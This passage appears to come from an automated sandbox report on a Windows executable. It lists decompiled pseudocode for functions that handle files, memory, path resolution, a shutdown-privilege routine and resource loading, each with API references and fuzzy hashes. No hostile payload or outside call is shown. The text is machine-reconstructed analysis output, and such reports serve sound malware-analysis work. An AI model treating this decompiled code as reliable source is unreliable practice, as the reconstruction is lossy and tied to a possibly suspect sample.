				 *[fs:eax] = _t21;
				_push(E00422A65);
				return E00407A20( &_v8);
			}






                                                                                    0x00422a1b
                                                                                    0x00422a22
                                                                                    0x00422a23
                                                                                    0x00422a28
                                                                                    0x00422a2b
                                                                                    0x00422a33
                                                                                    0x00422a41
                                                                                    0x00422a4a
                                                                                    0x00422a4d
                                                                                    0x00422a50
                                                                                    0x00422a5d

                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,00422A5E,?,?,00000000,?,00422A71,00422DE2,00000000,00422E27,?,?,00000000,00000000), ref: 00422A41
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
                                                                                    • Instruction ID: ce0c41168f735205187e46b6c3e9294348714fcf51f30dd0002a5427be662740
                                                                                    • Opcode Fuzzy Hash: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
                                                                                    • Instruction Fuzzy Hash: D7E09231704308BBD721EB76DE9291AB7ECD788700BA14876B500E7682E6B86E108418
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00423DA8, Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00423DA8(signed int __ecx, void* __edx, signed char _a4, signed char _a8) {
				void* _t17;

				_t17 = CreateFileW(E004084EC(__edx),  *(0x4b92e0 + (_a8 & 0x000000ff) * 4),  *(0x4b92ec + (_a4 & 0x000000ff) * 4), 0,  *(0x4b92fc + (__ecx & 0x000000ff) * 4), 0x80, 0); // executed
				return _t17;
			}




                                                                                    0x00423de5
                                                                                    0x00423ded

                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00423DE5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
                                                                                    • Instruction ID: 37fe8146f2431012b4276926014d9d5fd10bf57e8855788e2bc853c5fce69268
                                                                                    • Opcode Fuzzy Hash: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
                                                                                    • Instruction Fuzzy Hash: 81E048716441283FD6149ADE7C91F76779C9709754F404563F684D7281C4A59D1086FC
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00409FA8, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00409FA8(void* __eax) {
				short _v532;
				void* __ebx;
				void* __esi;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t16 = __eax;
				_t22 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameW( *(__eax + 4),  &_v532, 0x20a);
					_t14 = E0040B234(_t21, _t16, _t18, _t19, _t22); // executed
					_t20 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t20;
					if(_t20 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}












                                                                                    0x00409fb0
                                                                                    0x00409fb2
                                                                                    0x00409fb6
                                                                                    0x00409fc6
                                                                                    0x00409fcf
                                                                                    0x00409fd4
                                                                                    0x00409fd6
                                                                                    0x00409fdb
                                                                                    0x00409fe0
                                                                                    0x00409fe0
                                                                                    0x00409fdb
                                                                                    0x00409fee

                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 00409FC6
                                                                                      • Part of subcall function 0040B234: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
                                                                                      • Part of subcall function 0040B234: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileModuleName$LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 4113206344-0
                                                                                    • Opcode ID: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
                                                                                    • Instruction ID: 1beb63cefa55d3dba2b36e2095187d50c135a0cf4330adb642bee8d6847d8901
                                                                                    • Opcode Fuzzy Hash: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
                                                                                    • Instruction Fuzzy Hash: 7BE0C971A013119BCB10DE58C8C5A4A3798AB08754F044AA6AD24DF387D3B5DD1487D5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00423ED8, Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00423ED8(intOrPtr* __eax) {
				int _t4;
				intOrPtr* _t7;

				_t7 = __eax;
				_t4 = SetEndOfFile( *(__eax + 4)); // executed
				if(_t4 == 0) {
					return E00423CAC( *_t7);
				}
				return _t4;
			}





                                                                                    0x00423ed9
                                                                                    0x00423edf
                                                                                    0x00423ee6
                                                                                    0x00000000
                                                                                    0x00423eea
                                                                                    0x00423ef0

                                                                                    APIs
                                                                                    • SetEndOfFile.KERNEL32(?,7FBD0010,004B6358,00000000), ref: 00423EDF
                                                                                      • Part of subcall function 00423CAC: GetLastError.KERNEL32(004237FC,00423D4F,?,?,00000000,?,004B5F76,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 00423CAF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 734332943-0
                                                                                    • Opcode ID: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
                                                                                    • Instruction ID: ae15968ab9cd064c61534cde2c099b4aac4a7b80231ae1acb8e6de6fcc6ca8bf
                                                                                    • Opcode Fuzzy Hash: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
                                                                                    • Instruction Fuzzy Hash: 58C04C61300210478B04EEBBD5C190666E85B582157414466B904DB216E67DD9158615
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040CAA4, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E0040CAA4() {
				intOrPtr _v16;
				struct _SYSTEM_INFO* _t3;

				GetSystemInfo(_t3); // executed
				return _v16;
			}





                                                                                    0x0040caa8
                                                                                    0x0040cab4

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InfoSystem
                                                                                    • String ID:
                                                                                    • API String ID: 31276548-0
                                                                                    • Opcode ID: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
                                                                                    • Instruction ID: 4f21eec972071caf62eebbeb90550a79e4d7a8082c8b53f17589c9beddeb5e45
                                                                                    • Opcode Fuzzy Hash: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
                                                                                    • Instruction Fuzzy Hash: CDA012984088002AC404AB194C4340F39C819C1114FC40224745CB62C2E61D866403DB
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00403BCC, Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00403BCC(signed int __eax) {
				void* _t4;
				intOrPtr _t7;
				signed int _t8;
				void** _t10;
				void* _t12;
				void* _t14;

				_t8 = __eax;
				E00403B60(__eax);
				_t4 = VirtualAlloc(0, 0x13fff0, 0x1000, 4); // executed
				if(_t4 == 0) {
					 *0x4bbaf0 = 0;
					return 0;
				} else {
					_t10 =  *0x4bbadc; // 0x4bbad8
					_t14 = _t4;
					 *_t14 = 0x4bbad8;
					 *0x4bbadc = _t4;
					 *(_t14 + 4) = _t10;
					 *_t10 = _t4;
					_t12 = _t14 + 0x13fff0;
					 *((intOrPtr*)(_t12 - 4)) = 2;
					 *0x4bbaf0 = 0x13ffe0 - _t8;
					_t7 = _t12 - _t8;
					 *0x4bbaec = _t7;
					 *(_t7 - 4) = _t8 | 0x00000002;
					return _t7;
				}
			}









                                                                                    0x00403bce
                                                                                    0x00403bd0
                                                                                    0x00403be3
                                                                                    0x00403bea
                                                                                    0x00403c3c
                                                                                    0x00403c45
                                                                                    0x00403bec
                                                                                    0x00403bec
                                                                                    0x00403bf2
                                                                                    0x00403bf4
                                                                                    0x00403bfa
                                                                                    0x00403bff
                                                                                    0x00403c02
                                                                                    0x00403c06
                                                                                    0x00403c11
                                                                                    0x00403c1e
                                                                                    0x00403c26
                                                                                    0x00403c28
                                                                                    0x00403c35
                                                                                    0x00403c39
                                                                                    0x00403c39

                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,004041E3,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000), ref: 00403BE3
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
                                                                                    • Instruction ID: ee114c9f451a66722181258b66a673b4223530c98f306d9f720d31c7abdd50f3
                                                                                    • Opcode Fuzzy Hash: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
                                                                                    • Instruction Fuzzy Hash: 71F087F2F002404FE7249F799D40742BAE8E709315B10827EE908EB799E7F488018B88
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00403CF6, Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 96%
                                                                                    			E00403CF6(void* __eax) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				void* _t13;
				int _t20;
				void* _t22;
				signed int _t26;
				signed int _t29;
				signed int _t30;
				void* _t34;
				intOrPtr _t35;
				signed int _t39;
				void* _t41;
				void* _t42;

				_push(_t29);
				_t42 = _t41 + 0xffffffdc;
				_t34 = __eax - 0x10;
				E00403C48();
				_t13 = _t34;
				 *_t42 =  *_t13;
				_v48 =  *((intOrPtr*)(_t13 + 4));
				_t26 =  *(_t13 + 0xc);
				if((_t26 & 0x00000008) != 0) {
					_t22 = _t34;
					_t39 = _t26 & 0xfffffff0;
					_t30 = 0;
					while(1) {
						VirtualQuery(_t22,  &_v44, 0x1c);
						if(VirtualFree(_t22, 0, 0x8000) == 0) {
							break;
						}
						_t35 = _v44.RegionSize;
						if(_t39 > _t35) {
							_t39 = _t39 - _t35;
							_t22 = _t22 + _t35;
							continue;
						}
						goto L10;
					}
					_t30 = _t30 | 0xffffffff;
				} else {
					_t20 = VirtualFree(_t34, 0, 0x8000); // executed
					if(_t20 == 0) {
						_t30 = _t29 | 0xffffffff;
					} else {
						_t30 = 0;
					}
				}
				L10:
				if(_t30 == 0) {
					 *_v48 =  *_t42;
					 *( *_t42 + 4) = _v48;
				}
				 *0x4bdb78 = 0;
				return _t30;
			}
















                                                                                    0x00403cfa
                                                                                    0x00403cfc
                                                                                    0x00403d01
                                                                                    0x00403d04
                                                                                    0x00403d09
                                                                                    0x00403d0d
                                                                                    0x00403d13
                                                                                    0x00403d17
                                                                                    0x00403d1d
                                                                                    0x00403d39
                                                                                    0x00403d3d
                                                                                    0x00403d40
                                                                                    0x00403d42
                                                                                    0x00403d4a
                                                                                    0x00403d5e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403d65
                                                                                    0x00403d6b
                                                                                    0x00403d6d
                                                                                    0x00403d6f
                                                                                    0x00000000
                                                                                    0x00403d6f
                                                                                    0x00000000
                                                                                    0x00403d6b
                                                                                    0x00403d60
                                                                                    0x00403d1f
                                                                                    0x00403d27
                                                                                    0x00403d2e
                                                                                    0x00403d34
                                                                                    0x00403d30
                                                                                    0x00403d30
                                                                                    0x00403d30
                                                                                    0x00403d2e
                                                                                    0x00403d73
                                                                                    0x00403d75
                                                                                    0x00403d7e
                                                                                    0x00403d87
                                                                                    0x00403d87
                                                                                    0x00403d8a
                                                                                    0x00403d9a

                                                                                    APIs
                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00403D27
                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00403D4A
                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00403D57
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Virtual$Free$Query
                                                                                    • String ID:
                                                                                    • API String ID: 778034434-0
                                                                                    • Opcode ID: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
                                                                                    • Instruction ID: 6789628300bf7aa479fe1b8b627d7daf3441881ad106b622f2e79b23e4dc796b
                                                                                    • Opcode Fuzzy Hash: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
                                                                                    • Instruction Fuzzy Hash: C5F06D353046005FD311DF1AC844B17BBE9EFC5711F15C67AE888973A1E635DD018796
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Function 0040A928, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 78%
                                                                                    			E0040A928(short* __eax, intOrPtr __edx) {
				short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				struct _WIN32_FIND_DATAW _v612;
				short _v1134;
				signed int _t50;
				signed int _t51;
				void* _t55;
				signed int _t88;
				signed int _t89;
				intOrPtr* _t90;
				signed int _t101;
				signed int _t102;
				short* _t112;
				struct HINSTANCE__* _t113;
				short* _t115;
				short* _t116;
				void* _t117;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t113 = GetModuleHandleW(L"kernel32.dll");
				if(_t113 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t115 = _v8 + 4;
						goto L10;
					} else {
						if( *((short*)(_v8 + 2)) == 0x5c) {
							_t116 = E0040A904(_v8 + 4);
							if( *_t116 != 0) {
								_t14 = _t116 + 2; // 0x2
								_t115 = E0040A904(_t14);
								if( *_t115 != 0) {
									L10:
									_t88 = _t115 - _v8;
									_t89 = _t88 >> 1;
									if(_t88 < 0) {
										asm("adc ebx, 0x0");
									}
									_t43 = _t89 + 1;
									if(_t89 + 1 <= 0x105) {
										E0040A34C( &_v1134, _v8, _t43);
										while( *_t115 != 0) {
											_t112 = E0040A904(_t115 + 2);
											_t50 = _t112 - _t115;
											_t51 = _t50 >> 1;
											if(_t50 < 0) {
												asm("adc eax, 0x0");
											}
											if(_t51 + _t89 + 1 <= 0x105) {
												_t55 =  &_v1134 + _t89 + _t89;
												_t101 = _t112 - _t115;
												_t102 = _t101 >> 1;
												if(_t101 < 0) {
													asm("adc edx, 0x0");
												}
												E0040A34C(_t55, _t115, _t102 + 1);
												_v20 = FindFirstFileW( &_v1134,  &_v612);
												if(_v20 != 0xffffffff) {
													FindClose(_v20);
													if(lstrlenW( &(_v612.cFileName)) + _t89 + 1 + 1 <= 0x105) {
														 *((short*)(_t117 + _t89 * 2 - 0x46a)) = 0x5c;
														E0040A34C( &_v1134 + _t89 + _t89 + 2,  &(_v612.cFileName), 0x105 - _t89 - 1);
														_t89 = _t89 + lstrlenW( &(_v612.cFileName)) + 1;
														_t115 = _t112;
														continue;
													}
												}
											}
											goto L24;
										}
										E0040A34C(_v8,  &_v1134, _v12);
									}
								}
							}
						}
					}
				} else {
					_t90 = GetProcAddress(_t113, "GetLongPathNameW");
					if(_t90 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v1134);
						_push(_v8);
						if( *_t90() == 0) {
							goto L4;
						} else {
							E0040A34C(_v8,  &_v1134, _v12);
						}
					}
				}
				L24:
				return _v16;
			}






















                                                                                    0x0040a934
                                                                                    0x0040a937
                                                                                    0x0040a93d
                                                                                    0x0040a94a
                                                                                    0x0040a94e
                                                                                    0x0040a98d
                                                                                    0x0040a994
                                                                                    0x0040a9d4
                                                                                    0x00000000
                                                                                    0x0040a996
                                                                                    0x0040a99e
                                                                                    0x0040a9af
                                                                                    0x0040a9b5
                                                                                    0x0040a9bb
                                                                                    0x0040a9c3
                                                                                    0x0040a9c9
                                                                                    0x0040a9d7
                                                                                    0x0040a9d9
                                                                                    0x0040a9dc
                                                                                    0x0040a9de
                                                                                    0x0040a9e0
                                                                                    0x0040a9e0
                                                                                    0x0040a9e3
                                                                                    0x0040a9eb
                                                                                    0x0040a9fc
                                                                                    0x0040aac3
                                                                                    0x0040aa0e
                                                                                    0x0040aa12
                                                                                    0x0040aa14
                                                                                    0x0040aa16
                                                                                    0x0040aa18
                                                                                    0x0040aa18
                                                                                    0x0040aa23
                                                                                    0x0040aa33
                                                                                    0x0040aa37
                                                                                    0x0040aa39
                                                                                    0x0040aa3b
                                                                                    0x0040aa3d
                                                                                    0x0040aa3d
                                                                                    0x0040aa43
                                                                                    0x0040aa5b
                                                                                    0x0040aa62
                                                                                    0x0040aa68
                                                                                    0x0040aa84
                                                                                    0x0040aa86
                                                                                    0x0040aaad
                                                                                    0x0040aabf
                                                                                    0x0040aac1
                                                                                    0x00000000
                                                                                    0x0040aac1
                                                                                    0x0040aa84
                                                                                    0x0040aa62
                                                                                    0x00000000
                                                                                    0x0040aa23
                                                                                    0x0040aad9
                                                                                    0x0040aad9
                                                                                    0x0040a9eb
                                                                                    0x0040a9c9
                                                                                    0x0040a9b5
                                                                                    0x0040a99e
                                                                                    0x0040a950
                                                                                    0x0040a95b
                                                                                    0x0040a95f
                                                                                    0x00000000
                                                                                    0x0040a961
                                                                                    0x0040a961
                                                                                    0x0040a96c
                                                                                    0x0040a970
                                                                                    0x0040a975
                                                                                    0x00000000
                                                                                    0x0040a977
                                                                                    0x0040a983
                                                                                    0x0040a983
                                                                                    0x0040a975
                                                                                    0x0040a95f
                                                                                    0x0040aade
                                                                                    0x0040aae7

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,004162BC,?,?), ref: 0040A945
                                                                                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A956
                                                                                    • FindFirstFileW.KERNEL32(?,?,kernel32.dll,004162BC,?,?), ref: 0040AA56
                                                                                    • FindClose.KERNEL32(?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA68
                                                                                    • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA74
                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AAB9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                    • String ID: GetLongPathNameW$\$kernel32.dll
                                                                                    • API String ID: 1930782624-3908791685
                                                                                    • Opcode ID: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
                                                                                    • Instruction ID: 0568a8f2c4c85ac628058e700237ad117df8c3680498263a44950cac296231c5
                                                                                    • Opcode Fuzzy Hash: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
                                                                                    • Instruction Fuzzy Hash: 7841A071B003189BCB20DE98CD85A9EB3B5AB44310F1485B69945F72C1EB7CAE51CF4A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004AF110, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42shutdownCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 91%
                                                                                    			E004AF110() {
				int _v4;
				struct _TOKEN_PRIVILEGES _v16;
				void* _v20;
				int _t7;

				if(E0041FF2C() != 2) {
					L5:
					_t7 = ExitWindowsEx(2, 0);
					asm("sbb eax, eax");
					return _t7 + 1;
				}
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) != 0) {
					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v16.Privileges));
					_v16.PrivilegeCount = 1;
					_v4 = 2;
					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
					if(GetLastError() == 0) {
						goto L5;
					}
					return 0;
				}
				return 0;
			}







                                                                                    0x004af11b
                                                                                    0x004af178
                                                                                    0x004af17c
                                                                                    0x004af184
                                                                                    0x00000000
                                                                                    0x004af186
                                                                                    0x004af12d
                                                                                    0x004af13f
                                                                                    0x004af144
                                                                                    0x004af14c
                                                                                    0x004af166
                                                                                    0x004af172
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004af174
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000028), ref: 004AF120
                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004AF126
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004AF13F
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF166
                                                                                    • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF16B
                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 004AF17C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                    • String ID: SeShutdownPrivilege
                                                                                    • API String ID: 107509674-3733053543
                                                                                    • Opcode ID: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
                                                                                    • Instruction ID: 15d82be9bc359c8987119149698676c325083c88dcd196a4f2f9cd1a299335ef
                                                                                    • Opcode Fuzzy Hash: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
                                                                                    • Instruction Fuzzy Hash: 75F06D70684301B5E610A6F2CD07F6B21C89B56B58FA00D3EBA84E91C2D7BDD81D42BF
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004AF9F0, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004AF9F0() {
				struct HRSRC__* _t10;
				void* _t11;
				void* _t12;

				_t10 = FindResourceW(0, 0x2b67, 0xa);
				if(_t10 == 0) {
					E004AF834();
				}
				if(SizeofResource(0, _t10) != 0x2c) {
					E004AF834();
				}
				_t11 = LoadResource(0, _t10);
				if(_t11 == 0) {
					E004AF834();
				}
				_t12 = LockResource(_t11);
				if(_t12 == 0) {
					E004AF834();
				}
				return _t12;
			}






                                                                                    0x004af9ff
                                                                                    0x004afa03
                                                                                    0x004afa05
                                                                                    0x004afa05
                                                                                    0x004afa15
                                                                                    0x004afa17
                                                                                    0x004afa17
                                                                                    0x004afa24
                                                                                    0x004afa28
                                                                                    0x004afa2a
                                                                                    0x004afa2a
                                                                                    0x004afa35
                                                                                    0x004afa39
                                                                                    0x004afa3b
                                                                                    0x004afa3b
                                                                                    0x004afa43

                                                                                    APIs
                                                                                    • FindResourceW.KERNEL32(00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 004AF9FA
